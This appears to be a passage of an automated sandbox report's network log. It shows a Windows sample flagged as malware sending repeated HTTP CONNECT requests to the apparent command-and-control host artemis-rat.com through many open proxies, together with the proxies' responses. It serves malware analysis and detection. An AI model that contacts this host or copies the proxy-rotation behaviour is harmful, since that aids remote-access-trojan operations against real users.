                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1514192.168.2.45490131.7.65.184437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.224904060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1515192.168.2.45466095.164.89.12388887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.225167990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.527060032 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1516192.168.2.45490281.143.236.2004437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.238836050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1517192.168.2.454024159.223.71.71641937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.241476059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1518192.168.2.454630103.23.101.9741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.259538889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1519192.168.2.454652200.39.139.659997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.259577990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.729512930 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1520192.168.2.45462662.176.12.11180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.259704113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.690457106 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1521192.168.2.454734107.173.185.72807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.271039009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.511224985 CET401INHTTP/1.0 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm="login"
                                              Connection: close
                                              Content-type: text/html; charset=utf-8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1522192.168.2.45458361.178.152.3173027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.271790028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.650355101 CET90INHTTP/1.1 200 OK
                                              Content-Type: application/json
                                              Connection: close
                                              Content-Length: 55


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1523192.168.2.454516120.194.4.15754437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.271795988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.722362995 CET319INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 170
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1524192.168.2.454677119.28.60.6480907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.271914005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.580847025 CET315INHTTP/1.1 400 Bad Request
                                              Server: hzg/hzg
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 168
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 7a 67 2f 68 7a 67 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>hzg/hzg</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1525192.168.2.454850104.16.195.74807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.273992062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.428553104 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1526192.168.2.45466483.243.92.15480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.277606964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1527192.168.2.454716147.75.92.25194017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.280828953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.558563948 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1528192.168.2.45493643.153.16.2304437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.286180973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1529192.168.2.45481338.54.6.3990807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.293956041 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:26.516653061 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1530192.168.2.454742177.234.194.1589997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.301894903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.960156918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866637945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.467514038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.762511015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.552172899 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1531192.168.2.45481938.162.4.6031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.329622984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.748258114 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1532192.168.2.453384116.99.225.170315267284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.329624891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366353989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366661072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.366576910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1533192.168.2.45493847.236.85.1134437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.329813957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1534192.168.2.45482538.162.27.25031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.330257893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.742017984 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1535192.168.2.45469045.11.95.16560097284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.330492020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1536192.168.2.45479338.7.4.899997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.330492973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1537192.168.2.449876197.234.58.102327677284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.330755949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1538192.168.2.454870104.20.205.191807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.331195116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.485512018 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1539192.168.2.454698219.243.212.11810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.332746029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1540192.168.2.45404951.75.126.150366947284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.333847046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846365929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366575003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356987953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366902113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366743088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362978935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1541192.168.2.452772185.104.63.5631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.334080935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366455078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
